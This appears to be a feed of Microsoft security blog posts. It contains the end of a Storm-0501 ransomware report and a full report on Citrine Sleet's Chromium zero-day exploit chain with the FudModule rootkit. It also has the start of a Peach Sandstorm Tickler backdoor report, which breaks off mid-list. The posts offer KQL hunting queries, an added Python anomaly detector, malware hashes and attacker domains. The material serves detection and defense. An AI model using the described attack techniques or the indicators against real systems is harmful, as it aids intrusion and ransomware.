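The same baseline-and-deviate logic can be run outside KQL over exported events, for example when correlating with a SIEM that is not Sentinel. This added Python example (not from the original post) builds a baseline of IP addresses, applications and OS platforms the sync account used during a trusted period, flags later events that leave that baseline or perform an ActionType outside the expected sync operations, and warns if the baseline itself already contains non-sync applications (the “make sure the account is not compromised” caveat). The events are constructed; the expected-action set is an assumption to be replaced by the set observed in your own tenant.

```python
from datetime import datetime

SYNC_ACCOUNT = "On-Premises Directory Synchronization Service Account"
# Applications the sync account normally reaches, per the guidance above.
EXPECTED_APPS = {"Microsoft Azure Active Directory Connect", "Windows Azure Active Directory",
                 "Microsoft Online Syndication Partner Portal"}
# Actions a healthy sync cycle performs. Assumption: derive the real set from your own tenant.
EXPECTED_ACTIONS = {"LogonSuccess", "update User.", "update Device.", "update Group."}
BASELINE_FIELDS = ("ip", "app", "os")
# End of the period treated as known good. Confirm the account was not already compromised then.
CUTOFF = "2024-09-15T00:00:00Z"


def _ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def build_baseline(events, cutoff=CUTOFF):
    """Collect the IPs, apps and OS platforms the sync account used before the cutoff."""
    base = {field: set() for field in BASELINE_FIELDS}
    for e in events:
        if e["account"] == SYNC_ACCOUNT and _ts(e["ts"]) < _ts(cutoff):
            for field in BASELINE_FIELDS:
                base[field].add(e[field])
    return base


def baseline_warnings(baseline):
    """Apps in the baseline that are not sync related: the 'known good' period may not be clean."""
    return baseline["app"] - EXPECTED_APPS


def find_deviations(events, cutoff=CUTOFF):
    """Flag post-cutoff sync-account events that leave the baseline or perform unexpected actions."""
    baseline = build_baseline(events, cutoff)
    deviations = []
    for e in events:
        if e["account"] != SYNC_ACCOUNT or _ts(e["ts"]) < _ts(cutoff):
            continue
        for field in BASELINE_FIELDS:
            if e[field] not in baseline[field]:
                deviations.append({"ts": e["ts"], "field": field, "value": e[field]})
        if e["action"] not in EXPECTED_ACTIONS:
            deviations.append({"ts": e["ts"], "field": "action", "value": e["action"]})
    return deviations


# Constructed events (not real telemetry). IPs are from the RFC 5737 documentation ranges.
_SYNC = dict(account=SYNC_ACCOUNT, ip="203.0.113.10",
             app="Windows Azure Active Directory", os="Windows Server 2022")
SAMPLE_EVENTS = [
    {**_SYNC, "ts": "2024-09-01T08:00:00Z", "app": "Microsoft Azure Active Directory Connect",
     "action": "LogonSuccess"},
    {**_SYNC, "ts": "2024-09-01T08:02:00Z", "action": "update User."},
    {**_SYNC, "ts": "2024-09-05T08:00:00Z", "action": "update Device."},
    {**_SYNC, "ts": "2024-09-16T08:00:00Z", "app": "Microsoft Azure Active Directory Connect",
     "action": "LogonSuccess"},                                              # normal sync after cutoff
    {**_SYNC, "ts": "2024-09-17T02:13:00Z", "ip": "198.51.100.77", "app": "Microsoft Graph PowerShell",
     "os": "Windows 10", "action": "LogonSuccess"},                          # interactive use, new IP/app/OS
    {**_SYNC, "ts": "2024-09-17T02:15:00Z", "ip": "198.51.100.77", "app": "Microsoft Graph PowerShell",
     "os": "Windows 10", "action": "Reset user password."},                  # plus an unexpected action
    {"ts": "2024-09-17T02:20:00Z", "account": "alice@contoso.example", "ip": "198.51.100.77",
     "app": "Microsoft Graph PowerShell", "os": "Windows 10", "action": "LogonSuccess"},  # other account
]

if __name__ == "__main__":
    print("baseline warnings:", baseline_warnings(build_baseline(SAMPLE_EVENTS)))
    for d in find_deviations(SAMPLE_EVENTS):
        print(d)
```

Feed it the union of IdentityLogonEvents and CloudAppEvents rows for the sync account (mapped to the ts/ip/app/os/action fields) and review every deviation; a single new IP or DeviceType for this account is enough to warrant pulling the Entra Connect server for forensics.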

Check which IP addresses Microsoft Entra Connect Sync account uses

This query reveals all IP addresses that the default Microsoft Entra Connect Sync account uses so those could be added as trusted IP addresses for the Entra ID sync account (make sure the account is not compromised before relying on this list)

IdentityLogonEvents
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| where ActionType == "LogonSuccess"
| distinct IPAddress
| union (CloudAppEvents
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| distinct IPAddress)
| distinct IPAddress

Federation and authentication domain changes

Explore the addition of a new authentication or federation domain, and validate that the new domain is a valid one that was purposefully added.

CloudAppEvents
| where Timestamp > ago(30d)
| where ActionType in ("Set domain authentication.", "Set federation settings on domain.")

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Assess your environment for ManageEngine, NetScaler, and ColdFusion vulnerabilities.

DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2022-47966","CVE-2023-4966","CVE-2023-29300","CVE-2023-38203")
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel
| join kind=inner (DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore, IsExploitAvailable, VulnerabilitySeverityLevel, PublishedDate, VulnerabilityDescription, AffectedSoftware) on CveId
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel, CvssScore, IsExploitAvailable, PublishedDate, VulnerabilityDescription, AffectedSoftware

Search for file IOC

let selectedTimestamp = datetime(2024-09-17T00:00:00.0000000Z);
let fileName = dynamic(["PostalScanImporter.exe","win.exe","name.dll","248.dll","cs240.dll","fel.ocx","theme.ocx","hana.ocx","obfs.ps1","recon.ps1"]);
let FileSHA256 = dynamic(["efb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d","a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc637293a40","caa21a8f13a0b77ff5808ad7725ff3af9b74ce5b67426c84538b8fa43820a031","d37dc37fdcebbe0d265b8afad24198998ae8c3b2c6603a9258200ea8a1bd7b4a","53e2dec3e16a0ff000a8c8c279eeeca8b4437edb8ec8462bfbd9f64ded8072d9","827f7178802b2e92988d7cff349648f334bc86317b0b628f4bb9264285fccf5f","ee80f3e3ad43a283cbc83992e235e4c1b03ff3437c880be02ab1d15d92a8348a","de09ec092b11a1396613846f6b082e1e1ee16ea270c895ec6e4f553a13716304","d065623a7d943c6e5a20ca9667aa3c41e639e153600e26ca0af5d7c643384670","c08dd490860b54ae20fa9090274da9ffa1ba163f00d1e462e913cf8c68c11ac1"]);
// From September 17th, run the search for 90 days; change selectedTimestamp accordingly.
search in (AlertEvidence, BehaviorEntities, CommonSecurityLog, DeviceBaselineComplianceProfiles, DeviceEvents, DeviceFileEvents, DeviceImageLoadEvents, DeviceLogonEvents, DeviceNetworkEvents, DeviceProcessEvents, DeviceRegistryEvents, DeviceFileCertificateInfo, DynamicEventCollection, EmailAttachmentInfo, OfficeActivity, SecurityEvent, ThreatIntelligenceIndicator)
    TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d))
    and (FileName in (fileName) or OldFileName in (fileName) or ProfileName in (fileName)
        or InitiatingProcessFileName in (fileName) or InitiatingProcessParentFileName in (fileName)
        or InitiatingProcessVersionInfoInternalFileName in (fileName) or InitiatingProcessVersionInfoOriginalFileName in (fileName)
        or PreviousFileName in (fileName) or ProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName)
        or DestinationFileName in (fileName) or SourceFileName in (fileName) or ServiceFileName in (fileName)
        or SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))

Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog, in addition to Microsoft Defender XDR detections list above.

Indicators of compromise (IOCs)

The following list provides indicators of compromise (IOCs) observed during our investigation. We encourage our customers to investigate these indicators within their environments and implement detections and protections to identify any past related activity and prevent future attacks against their systems.

File name | SHA-256 | Description
PostalScanImporter.exe, win.exe | efb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d | Embargo ransomware
win.exe | a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc637293a40 | Embargo ransomware
name.dll | caa21a8f13a0b77ff5808ad7725ff3af9b74ce5b67426c84538b8fa43820a031 | Cobalt Strike
248.dll | d37dc37fdcebbe0d265b8afad24198998ae8c3b2c6603a9258200ea8a1bd7b4a | Cobalt Strike
cs240.dll | 53e2dec3e16a0ff000a8c8c279eeeca8b4437edb8ec8462bfbd9f64ded8072d9 | Cobalt Strike
fel.ocx | 827f7178802b2e92988d7cff349648f334bc86317b0b628f4bb9264285fccf5f | Cobalt Strike
theme.ocx | ee80f3e3ad43a283cbc83992e235e4c1b03ff3437c880be02ab1d15d92a8348a | Cobalt Strike
hana.ocx | de09ec092b11a1396613846f6b082e1e1ee16ea270c895ec6e4f553a13716304 | Cobalt Strike
obfs.ps1 | d065623a7d943c6e5a20ca9667aa3c41e639e153600e26ca0af5d7c643384670 | ADRecon
recon.ps1 | c08dd490860b54ae20fa9090274da9ffa1ba163f00d1e462e913cf8c68c11ac1 | ADRecon

Omri Refaeli, Tafat Gaspar, Vaibhav Deshmukh, Naya Hashem, Charles-Edouard Bettan

Microsoft Threat Intelligence Community

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Storm-0501: Ransomware attacks expanding to hybrid cloud environments appeared first on Microsoft Security Blog.

North Korean threat actor Citrine Sleet exploiting Chromium zero-day
http://approjects.co.za/?big=en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/
Fri, 30 Aug 2024 16:00:00 +0000

Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium (CVE-2024-7971) to gain remote code execution (RCE) in the Chromium renderer process. Our assessment of ongoing analysis and observed infrastructure attributes this activity to Citrine Sleet, a North Korean threat actor that commonly targets the cryptocurrency sector for financial gain.

On August 19, 2024, Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium, now identified as CVE-2024-7971, to gain remote code execution (RCE). We assess with high confidence that the observed exploitation of CVE-2024-7971 can be attributed to a North Korean threat actor targeting the cryptocurrency sector for financial gain. Our ongoing analysis and observed infrastructure lead us to attribute this activity with medium confidence to Citrine Sleet. We note that while the FudModule rootkit deployed has also been attributed to Diamond Sleet, another North Korean threat actor, Microsoft previously identified shared infrastructure and tools between Diamond Sleet and Citrine Sleet, and our analysis indicates this might be shared use of the FudModule malware between these threat actors.

CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine, impacting versions of Chromium prior to 128.0.6613.84. Exploiting the vulnerability could allow threat actors to gain RCE in the sandboxed Chromium renderer process. Google released a fix for the vulnerability on August 21, 2024, and users should ensure they are using the latest version of Chromium. We would like to thank the Chromium team for their collaboration in addressing this issue. CVE-2024-7971 is the third exploited V8 type confusion vulnerability patched this year, after CVE-2024-4947 and CVE-2024-5274. As with any observed nation-state actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information to help secure their environments.

In this blog, we share details on the North Korean threat actor Citrine Sleet and the observed tactics, techniques, and procedures (TTPs) used to exploit CVE-2024-7971, deploy the FudModule rootkit, and compromise systems. We further provide recommended mitigations, detection details, hunting guidance, and indicators of compromise (IOCs) to help defenders identify, respond to, and improve defenses against these attacks.

Who is Citrine Sleet?

The threat actor that Microsoft tracks as Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain. As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it. The threat actor creates fake websites masquerading as legitimate cryptocurrency trading platforms and uses them to distribute fake job applications or lure targets into downloading a weaponized cryptocurrency wallet or trading application based on legitimate applications. Citrine Sleet most commonly infects targets with the unique trojan malware it developed, AppleJeus, which collects information necessary to seize control of the targets’ cryptocurrency assets. The FudModule rootkit described in this blog has now been tied to Citrine Sleet as shared tooling with Diamond Sleet.

The United States government has assessed that North Korean actors, like Citrine Sleet, will likely continue targeting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime. One of the organizations targeted by the CVE-2024-7971 exploitation was also previously targeted by Sapphire Sleet.

Citrine Sleet is tracked by other security companies as AppleJeus, Labyrinth Chollima, UNC4736, and Hidden Cobra, and has been attributed to Bureau 121 of North Korea’s Reconnaissance General Bureau.

Exploiting CVE-2024-7971

The observed zero-day exploit attack by Citrine Sleet used the typical stages seen in browser exploit chains. First, the targets were directed to the Citrine Sleet-controlled exploit domain voyagorclub[.]space. While we cannot confirm at this time how the targets were directed, social engineering is a common tactic used by Citrine Sleet. Once a target connected to the domain, the zero-day RCE exploit for CVE-2024-7971 was served.

After the RCE exploit achieved code execution in the sandboxed Chromium renderer process, shellcode containing a Windows sandbox escape exploit and the FudModule rootkit was downloaded, and then loaded into memory. The sandbox escape exploited CVE-2024-38106, a vulnerability in the Windows kernel that Microsoft fixed on August 13, 2024, before Microsoft discovered this North Korean threat actor activity. CVE-2024-38106 was reported to Microsoft Security Response Center (MSRC) as being exploited; however, our investigations so far have not suggested any link between the reported CVE-2024-38106 exploit activity and this Citrine Sleet exploit activity, beyond exploiting the same vulnerability. This may suggest a “bug collision,” where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors.

Once the sandbox escape exploit was successful, the main FudModule rootkit ran in memory. This rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt kernel security mechanisms, executes exclusively from user mode, and performs kernel tampering through a kernel read/write primitive. We did not observe any additional malware activity on the target devices.

Figure: CVE-2024-7971 zero-day exploitation attack chain leading to the FudModule rootkit (diagram of Citrine Sleet exploiting the Chromium zero-day)

FudModule rootkit

FudModule is a sophisticated rootkit malware that specifically targets kernel access while evading detection. Threat actors have been observed using the FudModule data-only rootkit to establish admin-to-kernel access to Windows-based systems to allow read/write primitive functions and perform DKOM.

Diamond Sleet has been observed using FudModule since October 2021. The earliest variant of FudModule was reported publicly in September 2022 by ESET and AhnLab researchers, when threat actors exploited known vulnerable drivers to establish admin-to-kernel access in the technique known as bring your own vulnerable driver (BYOVD). In February 2024, Avast researchers published analysis on an updated FudModule variant that is significantly more advanced and difficult to detect, since it exploits a zero-day vulnerability in appid.sys, an AppLocker driver that is installed by default into Windows (CVE-2024-21338).

Further research by Avast uncovered a full attack chain deploying the updated variant of FudModule known as “FudModule 2.0,” which includes malicious loaders and a late-stage remote access trojan (RAT). This attack chain revealed the previously unknown malware Kaolin RAT was responsible for loading the FudModule rootkit to targeted devices. Kaolin RAT established a secure, AES-encrypted connection with the command and control (C2) server and had capabilities to execute a robust list of commands, such as downloading and uploading files to the C2 server and creating or updating processes. The updated variant of FudModule exhibited an attack chain similar to that seen in Citrine Sleet’s zero-day exploit of CVE-2024-7971.

On August 13, Microsoft released a security update to address a zero-day vulnerability in the AFD.sys driver in Windows (CVE-2024-38193) identified by Gen Threat Labs. In early June, Gen Threat Labs identified Diamond Sleet exploiting this vulnerability in an attack employing the FudModule rootkit, which establishes full standard user-to-kernel access, advancing from the previously seen admin-to-kernel access. Gen Threat Labs released this information publicly on August 16.

Recommendations

The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106. Microsoft released a security update on August 13, 2024, for the CVE-2024-38106 vulnerability exploited by Diamond Sleet, thus also blocking attempts to exploit the CVE-2024-7971 exploit chain on updated systems. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security.

Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation. Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen operating environment configuration

  • Keep operating systems and applications up to date. Apply security patches as soon as possible. Ensure that Google Chrome web browser is updated at version 128.0.6613.84 or later, and Microsoft Edge web browser is updated at version 128.0.2739.42 or later to address the CVE-2024-7971 vulnerability.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.

Strengthen Microsoft Defender for Endpoint configuration

  • Ensure that tamper protection is turned on in Microsoft Defender for Endpoint.
  • Enable network protection in Microsoft Defender for Endpoint.
  • Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to help resolve breaches, significantly reducing alert volume.

Strengthen Microsoft Defender Antivirus configuration

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.
  • Turn on Microsoft Defender Antivirus scanning of downloaded files and attachments.
  • Turn on real-time protection in Microsoft Defender Antivirus.

Detection details

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alert might also indicate threat activity related to this threat. Note, however, that this alert can also be triggered by unrelated threat activity.

  • Emerging threat activity group Citrine Sleet detected

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

  • CVE-2024-7971
  • CVE-2024-38106

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence and protection information, and recommend actions to help prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Citrine Sleet domain activity

Microsoft Defender XDR customers may query for devices that may have interacted with Citrine Sleet domains related to this activity. Note that Microsoft Defender for Endpoint customers may surface related events with the alert title “Emerging threat activity group Citrine Sleet detected”.

let domainList = dynamic(["weinsteinfrog.com", "voyagorclub.space"]);
// Tables that expose Timestamp are aliased to TimeGenerated so that the union
// has a single time column and the final sort applies to every row.
union
(
    DnsEvents
    | where QueryType has_any(domainList) or Name has_any(domainList)
    | project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents"
),
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    | where RemoteUrl has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
    DeviceNetworkInfo
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
    VMConnection
    | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
    | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
    | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
    | project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection"
),
(
    W3CIISLog
    | where csHost has_any(domainList) or csReferer has_any(domainList)
    | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by TimeGenerated desc

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Search for domain IOCs

let domainList = dynamic(["weinsteinfrog.com", "voyagorclub.space"]);
union
(
    DnsEvents
    | where QueryType has_any(domainList) or Name has_any(domainList)
    | project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents"
),
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project TimeGenerated, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    | where RemoteUrl has_any(domainList)
    | project TimeGenerated, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
    DeviceNetworkInfo
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project TimeGenerated, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
    VMConnection
    | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
    | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
    | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
    | project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection"
),
(
    W3CIISLog
    | where csHost has_any(domainList) or csReferer has_any(domainList)
    | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project TimeGenerated, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project TimeGenerated, Domain = Url, SourceTable = "UrlClickEvents"
),
(
    CommonSecurityLog
    | where DestinationDnsDomain has_any(domainList)
    | project TimeGenerated, Domain = DestinationDnsDomain, SourceTable = "CommonSecurityLog"
),
(
    EmailEvents
    | where SenderFromDomain has_any(domainList) or SenderMailFromDomain has_any(domainList)
    | project TimeGenerated, SenderfromDomain = SenderFromDomain, SenderMailfromDomain = SenderMailFromDomain, SourceTable = "EmailEvents"
)
| order by TimeGenerated desc

Assess presence of vulnerabilities used by Citrine Sleet

DeviceTvmSoftwareVulnerabilities
| where CveId has_any ("CVE-2024-7971", "CVE-2024-38106", "CVE-2024-38193", "CVE-2024-21338")
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion,
    CveId, VulnerabilitySeverityLevel
| join kind=inner (
    DeviceTvmSoftwareVulnerabilitiesKB
    | project CveId, CvssScore, IsExploitAvailable, VulnerabilitySeverityLevel, PublishedDate, VulnerabilityDescription, AffectedSoftware
) on CveId
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion,
    CveId, VulnerabilitySeverityLevel, CvssScore, IsExploitAvailable, PublishedDate, VulnerabilityDescription, AffectedSoftware

Indicators of compromise

During the attacks, Microsoft observed the following IOCs:

  • voyagorclub[.]space
  • weinsteinfrog[.]com

Learn more

Read our blogs on threat actors, including Sleet actors. For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post North Korean threat actor Citrine Sleet exploiting Chromium zero-day appeared first on Microsoft Security Blog.

Peach Sandstorm deploys new custom Tickler malware in long-running intelligence gathering operations
http://approjects.co.za/?big=en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/
Wed, 28 Aug 2024 15:00:00 +0000

Between April and July 2024, Microsoft observed Iranian state-sponsored threat actor Peach Sandstorm deploying a new custom multi-stage backdoor, which we named Tickler. Tickler has been used in attacks against targets in the satellite, communications equipment, oil and gas, as well as federal and state government sectors in the United States and the United Arab Emirates. This activity is consistent with the threat actor’s persistent intelligence gathering objectives and represents the latest evolution of their long-standing cyber operations.

Peach Sandstorm also continued conducting password spray attacks against the educational sector for infrastructure procurement and against the satellite, government, and defense sectors as primary targets for intelligence collection. In addition, Microsoft observed intelligence gathering and possible social engineering targeting organizations within the higher education, satellite, and defense sectors via the professional networking platform LinkedIn.

Microsoft assesses that Peach Sandstorm operates on behalf of the Iranian Islamic Revolutionary Guard Corps (IRGC) based on the group’s victimology and operational focus. Microsoft further assesses that Peach Sandstorm’s operations are designed to facilitate intelligence collection in support of Iranian state interests.

Microsoft tracks Peach Sandstorm campaigns and directly notifies customers who we observe have been targeted or compromised, providing them with the necessary information to help secure their environment. As part of our continuous monitoring, analysis, and reporting on the threat landscape, we are sharing our research on Peach Sandstorm’s use of Tickler to raise awareness of this threat actor’s evolving tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity. Microsoft published information on unrelated election interference linked to Iran in the most recent Microsoft Threat Analysis Center (MTAC) report.

Evolution of Peach Sandstorm tradecraft

In past campaigns, Peach Sandstorm has been observed to use password spray attacks to gain access to targets of interest with a high level of success. The threat actor has also conducted intelligence gathering via LinkedIn, researching organizations and individuals employed in the higher education, satellite, and defense sectors.

During the group’s latest operations, Microsoft observed new tactics, techniques, and procedures (TTPs) following initial access via password spray attacks or social engineering. Between April and July 2024, Peach Sandstorm deployed a new custom multi-stage backdoor, Tickler, and leveraged Azure infrastructure hosted in fraudulent, attacker-controlled Azure subscriptions for command-and-control (C2). Microsoft continuously monitors Azure, along with all Microsoft products and services, to ensure compliance with our terms of service. Microsoft has notified affected organizations and disrupted the fraudulent Azure infrastructure and accounts associated with this activity.

Figure 1. Peach Sandstorm attack chain, from initial access to the deployment of the Tickler backdoor

Intelligence gathering on LinkedIn

Going back to at least November 2021 and continuing through mid-2024, Microsoft observed Peach Sandstorm using multiple LinkedIn profiles masquerading as students, developers, and talent acquisition managers based in the US and Western Europe. Peach Sandstorm primarily used them to conduct intelligence gathering and possible social engineering against the higher education and satellite sectors and related industries. The identified LinkedIn accounts were subsequently taken down. Information on LinkedIn’s policies and actions against inauthentic behavior on its platform is available here.

Password spray attacks as a common attack vector

Since at least February 2023, Microsoft has observed Peach Sandstorm carrying out password spray activity against thousands of organizations. In password spray attacks, threat actors attempt to authenticate to many different accounts using a single password or a list of commonly used passwords. In contrast to brute force attacks, which target a single account using many passwords, password spray attacks help adversaries maximize their chances for success and minimize the likelihood of automatic account lockouts.

Microsoft has observed that once Peach Sandstorm has verified a target account’s credentials using the password spray technique, the threat actor performed subsequent sign-ins to the compromised accounts from commercial VPN infrastructure.

In April and May 2024, Microsoft observed Peach Sandstorm conducting password spray attacks targeting organizations in the defense, space, education, and government sectors in the US and Australia. In particular, Peach Sandstorm continued to use the “go-http-client” user agent that they are known to leverage in password spray campaigns. While the password spray activity appeared consistently across sectors, Microsoft observed Peach Sandstorm exclusively leveraging compromised user accounts in the education sector to procure operational infrastructure. In these cases, the threat actor accessed existing Azure subscriptions or created one using the compromised account to host their infrastructure. The attacker-controlled Azure infrastructure then served as C2 or operational hops for Peach Sandstorm operations targeting the government, defense, and space sectors. Recent updates to security defaults in Azure, such as multi-factor authentication, help ensure that Azure accounts are more resistant to account compromise techniques such as those used by Peach Sandstorm.

Tickler malware

Microsoft Threat Intelligence identified two samples of the Tickler malware, a custom multi-stage backdoor, that Peach Sandstorm deployed in compromised environments as recently as July 2024. The first sample was contained in an archive file named Network Security.zip alongside benign PDF files used as decoy documents. The archive file contained:

  • YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf.exe – the Tickler malware
  • Yahsat Policy Guide- April 2024.pdf – a benign PDF
  • YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf – a second benign PDF

YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf.exe is a 64-bit, C/C++-based native PE file. The sample begins with a Process Environment Block (PEB) traversal to locate the in-memory base address of kernel32.dll.

Once the PEB traversal yields the address of kernel32.dll in memory, the sample decrypts the string “LoadLibraryA” and resolves that export’s address, then decrypts the string “kernel32.dll” and loads it again using LoadLibraryA. The sample then launches the benign PDF file YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf as a decoy document.

The sample collects network information from the host and sends it to the C2 URI via an HTTP POST request, likely as a means for the threat actor to orient themselves on the compromised network. The network information below is an example generated in a lab environment:

Figure 2. Network information collected by Tickler after deployment on the target host (screenshot of sample network information)

We subsequently observed Peach Sandstorm iterating and improving on this initial sample. The second Tickler sample, sold.dll, is a Trojan dropper functionally identical to the previously identified sample. The malware downloads additional payloads from the C2 server, including a backdoor, a batch script to set persistence for this backdoor, and the following legitimate files:

